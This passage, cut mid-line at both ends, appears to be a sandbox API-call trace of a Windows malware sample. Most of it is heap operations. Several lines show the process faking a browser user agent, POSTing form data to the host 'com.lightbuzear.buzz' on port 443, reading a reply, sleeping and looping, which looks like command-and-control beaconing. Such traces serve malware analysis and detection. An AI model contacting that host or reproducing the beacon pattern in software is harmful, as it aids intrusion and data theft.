dwFlags=0x0, lpMem=0x482ca80 | out: hHeap=0x4780000) returned 1 [0300.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeb00 [0300.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0300.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0300.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0300.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeba0 [0300.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0300.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eecb8 [0300.350] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0300.351] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0300.351] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0300.351] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0300.351] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eecb8 | out: hHeap=0x4780000) returned 1 [0300.351] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0300.351] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0300.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0300.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0300.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0300.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0300.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0300.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0300.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0300.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c8b8 [0300.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0300.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb28 [0300.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c8b8 | out: hHeap=0x4780000) returned 1 [0300.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0300.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0300.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eecb8 [0300.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0300.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0300.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eecb8 | out: hHeap=0x4780000) returned 1 [0300.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eee20 [0300.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0300.353] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0300.353] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0300.353] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0300.354] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0300.354] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0301.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0301.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0301.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0301.431] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0301.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0301.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0301.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0301.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0301.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0301.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0301.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0301.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0301.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0301.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c900 [0301.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0301.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca08 [0301.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c900 | out: hHeap=0x4780000) returned 1 [0301.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0301.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca08 | out: hHeap=0x4780000) returned 1 [0301.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eecb8 [0301.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0301.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0301.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eecb8 | out: hHeap=0x4780000) returned 1 [0301.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eecb8 [0301.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0301.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed80 [0301.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0301.433] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0301.433] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0301.434] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0301.434] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed80 | out: hHeap=0x4780000) returned 1 [0301.434] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0301.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0301.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0301.434] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0301.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0301.434] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0301.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0301.434] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0301.434] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0301.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0301.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c960 [0301.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0301.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c9f0 [0301.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0301.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0301.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9f0 | out: hHeap=0x4780000) returned 1 [0301.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeb00 [0301.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0301.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0301.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0301.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eedd0 [0301.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0301.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0301.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0301.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0301.436] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0301.436] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0301.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0301.437] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0301.437] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0301.437] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0301.437] FreeLibrary (hLibModule=0x71570000) returned 1 [0301.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0301.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0301.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb78 | out: hHeap=0x4780000) returned 1 [0301.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec90 | out: hHeap=0x4780000) returned 1 [0301.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeda8 | out: hHeap=0x4780000) returned 1 [0301.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec40 | out: hHeap=0x4780000) returned 1 [0301.438] Sleep (dwMilliseconds=0x2710) [0301.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0301.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0301.469] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0301.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0301.469] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0301.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0301.469] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0301.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0301.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0301.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c9a8 [0301.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0301.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c8b8 [0301.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9a8 | out: hHeap=0x4780000) returned 1 [0301.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0301.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c8b8 | out: hHeap=0x4780000) returned 1 [0301.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c930 [0301.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec90 [0301.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec90 | out: hHeap=0x4780000) returned 1 [0301.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0301.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0301.471] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0301.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0301.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0301.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0301.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0301.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0301.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0301.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0301.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0301.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0301.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca80 [0301.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0301.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c948 [0301.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca80 | out: hHeap=0x4780000) returned 1 [0301.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0301.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c948 | out: hHeap=0x4780000) returned 1 [0301.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeb28 [0301.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0301.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0301.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb28 | out: hHeap=0x4780000) returned 1 [0301.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb28 [0301.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0301.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eedf8 [0301.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0301.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0301.474] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0301.474] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0301.474] FreeLibrary (hLibModule=0x71780000) returned 1 [0301.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eedf8 | out: hHeap=0x4780000) returned 1 [0301.474] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0301.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec90 [0301.474] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0301.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0301.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0301.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0301.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0301.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0301.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0301.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0301.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0301.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0301.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca50 [0301.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0301.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cab0 [0301.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca50 | out: hHeap=0x4780000) returned 1 [0301.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0301.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cab0 | out: hHeap=0x4780000) returned 1 [0301.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c8e8 [0301.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0301.476] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0301.476] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0301.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0301.476] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0301.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed08 [0301.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0301.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0301.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0301.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0301.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0301.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0301.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0301.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0301.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0301.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca50 [0301.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0301.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cab0 [0301.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca50 | out: hHeap=0x4780000) returned 1 [0301.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0301.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cab0 | out: hHeap=0x4780000) returned 1 [0301.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ca98 [0301.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeda8 [0301.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeda8 | out: hHeap=0x4780000) returned 1 [0301.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0301.478] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0301.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0301.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0301.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0301.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0301.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0301.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0301.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0301.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0301.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0301.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cae0 [0301.479] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0301.479] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c8a0 [0301.479] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cae0 | out: hHeap=0x4780000) returned 1 [0301.479] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0301.479] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c8a0 | out: hHeap=0x4780000) returned 1 [0301.479] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eed30 [0301.479] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0301.479] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0301.479] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0301.479] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed58 [0301.479] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0301.480] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec18 [0301.480] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0301.480] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0301.491] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0301.491] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0301.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec18 | out: hHeap=0x4780000) returned 1 [0301.492] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0301.492] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0301.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0301.492] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0301.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0301.492] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0301.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0301.492] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0301.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0301.492] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c8d0 [0301.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0301.492] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb10 [0301.492] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, 